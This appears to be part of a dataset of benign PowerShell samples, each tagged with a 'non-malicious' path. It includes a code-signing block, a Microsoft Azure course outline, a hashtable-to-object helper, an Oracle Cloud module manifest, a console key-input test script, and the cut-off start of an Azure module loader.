// SIG // 7FShgheXMIIXkwYKKwYBBAGCNwMDATGCF4Mwghd/Bgkq
// SIG // hkiG9w0BBwKgghdwMIIXbAIBAzEPMA0GCWCGSAFlAwQC
// SIG // AQUAMIIBUgYLKoZIhvcNAQkQAQSgggFBBIIBPTCCATkC
// SIG // AQEGCisGAQQBhFkKAwEwMTANBglghkgBZQMEAgEFAAQg
// SIG // e7XMSiwfGZ3XnojGzaEzPUPRYi0pV4kW47OknUVsGhgC
// SIG // BmYyvuFZ0RgTMjAyNDA1MDgwNTIxMTEuOTU5WjAEgAIB
// SIG // 9KCB0aSBzjCByzELMAkGA1UEBhMCVVMxEzARBgNVBAgT
// SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc
// SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMG
// SIG // A1UECxMcTWljcm9zb2Z0IEFtZXJpY2EgT3BlcmF0aW9u
// SIG // czEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjkyMDAt
// SIG // MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt
// SIG // ZS1TdGFtcCBTZXJ2aWNloIIR7TCCByAwggUIoAMCAQIC
// SIG // EzMAAAHnLo8vkwtPG+kAAQAAAecwDQYJKoZIhvcNAQEL
// SIG // BQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
// SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
// SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd
// SIG // TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcN
// SIG // MjMxMjA2MTg0NTE5WhcNMjUwMzA1MTg0NTE5WjCByzEL
// SIG // MAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
// SIG // EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
// SIG // c29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9z
// SIG // b2Z0IEFtZXJpY2EgT3BlcmF0aW9uczEnMCUGA1UECxMe
// SIG // blNoaWVsZCBUU1MgRVNOOjkyMDAtMDVFMC1EOTQ3MSUw
// SIG // IwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2
// SIG // aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKC
// SIG // AgEAwlefL+CLkOufVzzNQ7WljL/fx0VAuZHYhBfPWAT+
// SIG // v0Z+5I6jJGeREnpn+RJYuAi7UFUnn0aRdY+0uSyyorDF
// SIG // jhkWi3GlWxk33JiNbzESdbczMAjSKAqv78vFh/EHVdQf
// SIG // wG+bCvkPciL8xsOO031zxPEZa2rsCv3vp1p8DLdOtGpB
// SIG // GYiSc9VYdS4UmCmoj/WdtxGZhhEwlooJCm3LgJ4b4d8q
// SIG // zGvPbgX2nh0GRBxkKnbJDOPBAXFklnaYkkgYgMcoR1JG
// SIG // 5J5fTz87Qf0lMc0WY1M1h4PW39ZqmdHCIgFgtBIyuzjY
// SIG // ZUHykkR1SyizT6Zd//lC+F43NGL3anPPIDi1K//OE/f8
// SIG // Sua/Nrpb0adgPP2q/XBuFu+udLimgMUQJoC+ISoCF+f9
// SIG // GiALG8qiTmujiBkhfWvg315dS6UDzSke/drHBe7Yw+Vq
// SIG // sCLon0vWFIhzL0S44ypNEkglf5qVwtAaD5JOWrH8a6yW
// SIG // wrCXjx0jhG5aSc0Zs2j+jjF8EXK2+01xUDrE5CrqpFr7
// SIG // 2CD71cwuvFDPjLJCz5XdXqnTjjCu0m239rRkmX9/ojsF
// SIG // kDHFlwfYMOYCtwCGCtPFpCSbssz6n4rYLm3UQpmK/Qlb
// SIG // DTrlvsBw2BoXIiQxdi5K45BVI1HF0iCXfX9rLGIrWfQr
// SIG // qxle+AUHH68Y75NS/I77Te5rpSMCAwEAAaOCAUkwggFF
// SIG // MB0GA1UdDgQWBBTP/uCYgJ82OHaRH/2Za4dSu96PWDAf
// SIG // BgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf
// SIG // BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv
// SIG // c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBU
// SIG // aW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmwwbAYI
// SIG // KwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8v
// SIG // d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01p
// SIG // Y3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEw
// SIG // KDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQM
// SIG // MAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkq
// SIG // hkiG9w0BAQsFAAOCAgEAdKHw25PpZVotXAup7H4nuSba
// SIG // dPaOm+gEQqb7Qz6tihT/oYvlDTT+yxnIirnJKlwpgUxS
// SIG // IXwXhksb5OsnKJHUK9/NeaRDmmFk5x70NPvISsvOq9Re
// SIG // K3wbuKBweXE8tPE+KIaxvzmBvwf4DZ89Dper+7v6hI8+
// SIG // PM12emZcShsmcCpimVmgXdg2BMMyqXS5AcbOgOnp1mUd
// SIG // I2PquRXW1eOYIRkyoEq+RAgDpyw+J4ycH4yKtJkWVsA2
// SIG // UKF7SUmlR0rtpR0C92BxBYpLp21EyXzXwQyy+xr/rE5k
// SIG // Yg2ZMuTgMaCxtoGk37ohW36Zknz3IJeQjlM3zEJ86Sn1
// SIG // +vhZCNEEDb7j6VrA1PLEfrp4tlZg6O65qia6JuIoYFTX
// SIG // S2jHzVKrwS+WYkitc5mhCwSfWvmDoxOaZkmq1ubBm5+4
// SIG // lZBdlvSUCDh+rRlixSUuR7N+s2oZKB4fIg/ety3ho2ap
// SIG // BbrCmlFu9sjI/8sU3hhAzqCK9+ZMF8a9VLvs5Lq9svhb
// SIG // jWNKGY6ac6feQFtZXoT9MWjvqAVdV372grq/weT1QKds
// SIG // c66LDBFHAMKSaYqPlWHyLnxo+5nl3BkGFgPFJq/CugLq
// SIG // PiZY/CHhUupUryoakKZnQcwDBqjzkCrdTsN2V8XoSu7w
// SIG // Iopt2YgC5TNCueOpNLGa8XWT4KZs+zvMPYBy7smQEHsw
// SIG // ggdxMIIFWaADAgECAhMzAAAAFcXna54Cm0mZAAAAAAAV
// SIG // MA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzET
// SIG // MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVk
// SIG // bW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0
// SIG // aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0
// SIG // aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAx
// SIG // ODIyMjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYT
// SIG // AlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
// SIG // EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
// SIG // cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1l
// SIG // LVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0BAQEF
// SIG // AAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7V
// SIG // gtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/H
// SIG // ZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY6GB9alKD
// SIG // RLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gm
// SIG // U3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36M
// SIG // EBydUv626GIl3GoPz130/o5Tz9bshVZN7928jaTjkY+y
// SIG // OSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoF
// SIG // VZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJi
// SIG // ss254o2I5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGa
// SIG // RnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+Autuqfjbs
// SIG // Nkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afo
// SIG // mXw/TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9
// SIG // ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk
// SIG // i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y
// SIG // 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV
// SIG // 2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3PmriLq0C
// SIG // AwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEw
// SIG // IwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/
// SIG // LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJlpxtTNRnp
// SIG // cjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8G
// SIG // CCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
// SIG // b20vcGtpb3BzL0RvY3MvUmVwb3NpdG9yeS5odG0wEwYD
// SIG // VR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAwe
// SIG // CgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB
// SIG // /wQFMAMBAf8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9
// SIG // lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDov
// SIG // L2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVj
// SIG // dHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoG
// SIG // CCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov
// SIG // L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS
// SIG // b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcN
// SIG // AQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/ypb+pc
// SIG // FLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHk
// SIG // wo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AF
// SIG // vonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM9W0jVOR4
// SIG // U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2
// SIG // EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8Atq
// SIG // gcKBGUIZUnWKNsIdw2FzLixre24/LAl4FOmRsqlb30mj
// SIG // dAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZM
// SIG // cm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQE
// SIG // cb9k+SS+c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2f
// SIG // pCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBM
// SIG // drVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L
// SIG // +DvktxW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJ
// SIG // C4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU
// SIG // 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/
// SIG // 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDUDCC
// SIG // AjgCAQEwgfmhgdGkgc4wgcsxCzAJBgNVBAYTAlVTMRMw
// SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
// SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
// SIG // b24xJTAjBgNVBAsTHE1pY3Jvc29mdCBBbWVyaWNhIE9w
// SIG // ZXJhdGlvbnMxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
// SIG // Tjo5MjAwLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
// SIG // b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsO
// SIG // AwIaAxUAs3IE5xmrEsHv3a7vnD3tTRf78EOggYMwgYCk
// SIG // fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGlu
// SIG // Z3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV
// SIG // TWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1N
// SIG // aWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkq
// SIG // hkiG9w0BAQsFAAIFAOnlJhYwIhgPMjAyNDA1MDcyMjEz
// SIG // NDJaGA8yMDI0MDUwODIyMTM0MlowdzA9BgorBgEEAYRZ
// SIG // CgQBMS8wLTAKAgUA6eUmFgIBADAKAgEAAgII+gIB/zAH
// SIG // AgEAAgIbXDAKAgUA6eZ3lgIBADA2BgorBgEEAYRZCgQC
// SIG // MSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQow
// SIG // CAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQAvbKy7
// SIG // ouAQm9mLGE3KaFIkK4lUd0lZdYQoD3W+0zEoIlV0MsSt
// SIG // UpXdRP6irQwK3890hWbhdqzX688SPX0cZeRYFSOqvfNp
// SIG // uid2+406/oSwJb/PKtS1b2cV+zf9OVEsVVUqGWVBSt7V
// SIG // Y+qCQNqyUkZ85s29XR2VXVT02oVqJtULkBeZxW8QMWUu
// SIG // 7DjsVcY/DNqMHbK0htp2nd4Koi0utmpO1q+kq1CD9mGO
// SIG // GMTEW2JNBJRiOgYxGkwcTW+GoRV3Xs+drXsqIYKD1BG3
// SIG // 87tLZWWKE25CZootCeFRr49NBLuF3MFS+joHcBqMWPIN
// SIG // u772XWF3Hvbo0f4mIagLpZCmv8gYMYIEDTCCBAkCAQEw
// SIG // gZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hp
// SIG // bmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
// SIG // FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMd
// SIG // TWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTACEzMA
// SIG // AAHnLo8vkwtPG+kAAQAAAecwDQYJYIZIAWUDBAIBBQCg
// SIG // ggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAv
// SIG // BgkqhkiG9w0BCQQxIgQgyYYCDCYKjJMLWCTRwP4uNUj1
// SIG // gnJNnqHQFklP7ZxKiKQwgfoGCyqGSIb3DQEJEAIvMYHq
// SIG // MIHnMIHkMIG9BCDlNl0NdmqG/Q3gxVzPVBR3hF++Bb9A
// SIG // Ab0DBu6gudZzrTCBmDCBgKR+MHwxCzAJBgNVBAYTAlVT
// SIG // MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
// SIG // ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y
// SIG // YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0
// SIG // YW1wIFBDQSAyMDEwAhMzAAAB5y6PL5MLTxvpAAEAAAHn
// SIG // MCIEIFWSerUVnqc8EIsoAVb5Dbw54/+kiHZT42o/9jna
// SIG // 7c6OMA0GCSqGSIb3DQEBCwUABIICAA0dXuHzCNzMyZIi
// SIG // 858H1fxZjUALL9yOc3qkGKBXW1tBHUNDfSt2XYBFQKtS
// SIG // Np6zhMiZCnHbZkZ+gX8C/5v/aGRxbNN3ZlrS4cMkASIq
// SIG // H8KvDEA7Rl6B17IeTRGE2Qzq+qZZL62a7cIDLut9Uu8o
// SIG // QDCQfjJ/+j1AaaJwP8qEqR8jUdFtLSjVZcZ7QraxEIC6
// SIG // uzxzv8jN7jiMbHeyo2ElgLUzKoN1kerRUndhT4MqtHXy
// SIG // hQZf1OlRf7LWNlgveJ1CAw8DFii84pofBtVRUvjxIeN+
// SIG // 3yzsW/shSU1cBNkMDaU2OH2/FpAsNJ9DeSvdPB9XIBCf
// SIG // xl2XkQiXGjPr+M7afLLFyqzn/bzpKQlioAtRrZPZ3iZN
// SIG // ARGR+zYKhiTryAyHgCQa3oj66gZIyIyDMtY1BZMo/nv/
// SIG // h5h2o7I0JSy1829CstwXDfzKbHDRODsqoRry35ZfIzg3
// SIG // 4jFmBSpM4KPcA0r6VInFdzYRxVjHQNH9aZ2wPyfHZRHK
// SIG // q6dHYDvpapP6LKt+SFXMH9ZAcS31EhVEv9bltoaH1Qma
// SIG // 6E5swc1e3Aeb/Z4z42mSS0wxQYWozJdoXVtgtaoSjdRA
// SIG // exQd0rAARcCaEi1eJRBCKHSJbjO8oHIY4fbWljUtUpWQ
// SIG // e85AHQZTc9CaufQZDsBysH5pNW67SABebm43OYjuv0ff
// SIG // 079jnRjd
// SIG // End signature block
|
combined_dataset/train/non-malicious/sample_60_43.ps1
|
sample_60_43.ps1
|
COURSE DATASHEET AZ-900T00 Microsoft Azure Fundamentals 4 Learning Path 2: Azure architecture and services 240 minutes Module 1: Core Azure architectural components Module 2: Azure compute and networking services Module 3: Azure storage services Module 4: Azure identity, access, and security Module 5: Review questions Module 6: Summary Describe Azure architecture and services (Learning Path) Learning Path 3: Azure management and governance 120 minutes Module 1: Cost management Module 2: Governance and compliance Module 3: Managing and deploying resources Module 4: Azure monitoring tools Module 5: Review questions Module 6: Summary Describe Azure management and governance (Learning Path) *Note that the Learning Path Timings are for delivery in a higher education setting without supplemental instruction about related concepts. Instructors who want to deliver in other settings or provide supplemental instruction in foundational or related concepts should plan for longer implementation.
|
combined_dataset/train/non-malicious/h20 -Hashtables 2 object_5.ps1
|
h20 -Hashtables 2 object_5.ps1
|
#hashtable to object function.
#used to be able to make custom objects with math inside the pipeline
#e.g. 1..10 | h20 { @{karl = $_;dude = $_+1} }
#gps | h20 { @{name = $_.processname; mem = $_.workingset / 1MB} }
function h20([scriptblock]$sb )
{
begin {}
process{ if ($sb -ne $null)
{
$ht = &$sb;
if ($ht -is [hashtable])
{
New-Object PSObject -Property $ht}
}
if ($ht -is [object[]])
{
$ht | % { New-Object PSObject -Property $_ }
}
}
end{}
}
|
combined_dataset/train/non-malicious/sample_48_16.ps1
|
sample_48_16.ps1
|
#
# Module manifest for module 'OCI.PSModules.Generativeai'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Generativeai.dll'
# Version number of this module.
ModuleVersion = '83.1.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = '88627585-5bbc-41e3-a1a5-15e5194ce97a'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Generativeai Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '83.1.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Generativeai.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCIGenerativeaiDedicatedAiCluster',
'Get-OCIGenerativeaiDedicatedAiClustersList',
'Get-OCIGenerativeaiEndpoint', 'Get-OCIGenerativeaiEndpointsList',
'Get-OCIGenerativeaiModel', 'Get-OCIGenerativeaiModelsList',
'Get-OCIGenerativeaiWorkRequest',
'Get-OCIGenerativeaiWorkRequestErrorsList',
'Get-OCIGenerativeaiWorkRequestLogsList',
'Get-OCIGenerativeaiWorkRequestsList',
'Move-OCIGenerativeaiDedicatedAiClusterCompartment',
'Move-OCIGenerativeaiEndpointCompartment',
'Move-OCIGenerativeaiModelCompartment',
'New-OCIGenerativeaiDedicatedAiCluster',
'New-OCIGenerativeaiEndpoint', 'New-OCIGenerativeaiModel',
'Remove-OCIGenerativeaiDedicatedAiCluster',
'Remove-OCIGenerativeaiEndpoint', 'Remove-OCIGenerativeaiModel',
'Update-OCIGenerativeaiDedicatedAiCluster',
'Update-OCIGenerativeaiEndpoint', 'Update-OCIGenerativeaiModel'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Generativeai'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/3212.ps1
|
3212.ps1
|
[CmdletBinding()]
param($maxKeys = 25)
class KeyInfo
{
KeyInfo([string]$k, [ConsoleKeyInfo]$ki, [bool]$investigate)
{
$this.Key = $k
$this.KeyChar = $ki.KeyChar
$this.ConsoleKey = $ki.Key
$this.Modifiers = $ki.Modifiers
$this.Investigate = $investigate
}
[string]$Key
[string]$KeyChar
[string]$ConsoleKey
[string]$Modifiers
[bool]$Investigate
}
$quit = $false
function ReadOneKey {
param(
[string]$key,
[string]$prompt = 'Enter <{0}>'
)
function Test-ConsoleKeyInfos($k1, $k2, $key) {
if ($k1.Modifiers -ne $k2.Modifiers) {
if ($key.Length -eq 1) {
if ($k1.Modifiers -band [ConsoleModifiers]::Control -or
$k2.Modifiers -band [ConsoleModifiers]::Control) {
return $false
}
}
}
if ($k1.Key -ne $k2.Key) {
$keyOk = $false
switch -regex ($k1.Key,$k2.Key) {
'^Oem.*' { $keyOk = $true; break }
'^D[0-9]$' { $keyOk = $true; break }
'^NumPad[0-9]$' { $keyOk = $true; break }
}
if (!$keyOk) {
return $false
}
}
return $k1.KeyChar -eq $k2.KeyChar
}
$expectedKi = [Microsoft.PowerShell.ConsoleKeyChordConverter]::Convert($key)[0]
Write-Host -NoNewline ("`n${prompt}: " -f $key)
$ki = [Console]::ReadKey($true)
if ($ki.KeyChar -ceq 'Q') { $script:quit = $true; return }
$investigate = $false
$doubleChecks = 0
while (!(Test-ConsoleKeyInfos $ki $expectedKi $key)) {
$doubleChecks++
if ($doubleChecks -eq 1) {
Write-Host -NoNewline "`nDouble checking that last result, enter <${k}> again: "
} else {
Write-Host -NoNewline "`nLast result not confirmed, enter <Spacebar> to skip or enter <${k}> to try again: "
$investigate = $true
}
$kPrev = $ki
$ki = [Console]::ReadKey($true)
if ($ki.KeyChar -ceq 'Q') { $quit = $true; return }
if ($ki.Key -eq [ConsoleKey]::Spacebar) {
$ki = $kPrev
break
}
if (Test-ConsoleKeyInfos $ki $kPrev $key) {
break
}
}
return [KeyInfo]::new($key, $ki, $investigate)
}
$setConsoleInputMode = $false
try
{
if ($PSVersionTable.PSVersion.Major -lt 6 -or $IsWindows)
{
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class KeyInfoNativeMethods
{
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr GetStdHandle(int handleId);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool GetConsoleMode(IntPtr hConsoleOutput, out uint dwMode);
[DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern bool SetConsoleMode(IntPtr hConsoleOutput, uint dwMode);
public static uint GetConsoleInputMode()
{
var handle = GetStdHandle(-10);
uint mode;
GetConsoleMode(handle, out mode);
return mode;
}
public static void SetConsoleInputMode(uint mode)
{
var handle = GetStdHandle(-10);
SetConsoleMode(handle, mode);
}
}
"@
[Flags()]
enum ConsoleModeInputFlags
{
ENABLE_PROCESSED_INPUT = 0x0001
ENABLE_LINE_INPUT = 0x0002
ENABLE_ECHO_INPUT = 0x0004
ENABLE_WINDOW_INPUT = 0x0008
ENABLE_MOUSE_INPUT = 0x0010
ENABLE_INSERT_MODE = 0x0020
ENABLE_QUICK_EDIT_MODE = 0x0040
ENABLE_EXTENDED_FLAGS = 0x0080
ENABLE_AUTO_POSITION = 0x0100
ENABLE_VIRTUAL_TERMINAL_PROCESSING = 0x0200
}
$prevMode = [KeyInfoNativeMethods]::GetConsoleInputMode()
$mode = $prevMode -band
-bnot ([ConsoleModeInputFlags]::ENABLE_PROCESSED_INPUT -bor
[ConsoleModeInputFlags]::ENABLE_LINE_INPUT -bor
[ConsoleModeInputFlags]::ENABLE_WINDOW_INPUT -bor
[ConsoleModeInputFlags]::ENABLE_MOUSE_INPUT)
Write-Verbose "Setting mode $mode"
[KeyInfoNativeMethods]::SetConsoleInputMode($mode)
$setConsoleInputMode = $true
}
else {
[Console]::TreatControlCAsInput = $true
}
$keyData = [System.Collections.Generic.List[KeyInfo]]::new()
$keys = Get-Content $PSScriptRoot\keydata.txt
$keys = $keys | Get-Random -Count $keys.Count
for ($i = 0; $i -lt $keys.Count; $i++) {
$k = $keys[$i]
if ($k -ceq 'Q') { continue }
$ki = ReadOneKey $k
if ($quit) { break }
$keyData.Add($ki)
}
}
finally
{
if ($setConsoleInputMode) {
[KeyInfoNativeMethods]::SetConsoleInputMode($prevMode)
}
else {
[Console]::TreatControlCAsInput = $false
}
$keyData | ConvertTo-Json | Out-File -Encoding ascii KeyInfo.json
}
|
combined_dataset/train/non-malicious/sample_44_95.ps1
|
sample_44_95.ps1
|
# region Generated
# ----------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Code generated by Microsoft (R) AutoRest Code Generator.Changes may cause incorrect behavior and will be lost if the code
# is regenerated.
# ----------------------------------------------------------------------------------
# Load required Az.Accounts module
$accountsName = 'Az.Accounts'
$accountsModule = Get-Module -Name $accountsName
if(-not $accountsModule) {
$localAccountsPath = Join-Path $PSScriptRoot 'generated\modules'
if(Test-Path -Path $localAccountsPath) {
$localAccounts = Get-ChildItem -Path $localAccountsPath -Recurse -Include 'Az.Accounts.psd1' | Select-Object -Last 1
if($localAccounts) {
$accountsModule = Import-Module -Name ($localAccounts.FullName) -Scope Global -PassThru
}
}
if(-not $accountsModule) {
$hasAdequateVersion = (Get-Module -Name $accountsName -ListAvailable | Where-Object { $_.Version -ge [System.Version]'2.7.5' } | Measure-Object).Count -gt 0
if($hasAdequateVersion) {
$accountsModule = Import-Module -Name $accountsName -MinimumVersion 2.7.5 -Scope Global -PassThru
}
}
}
if(-not $accountsModule) {
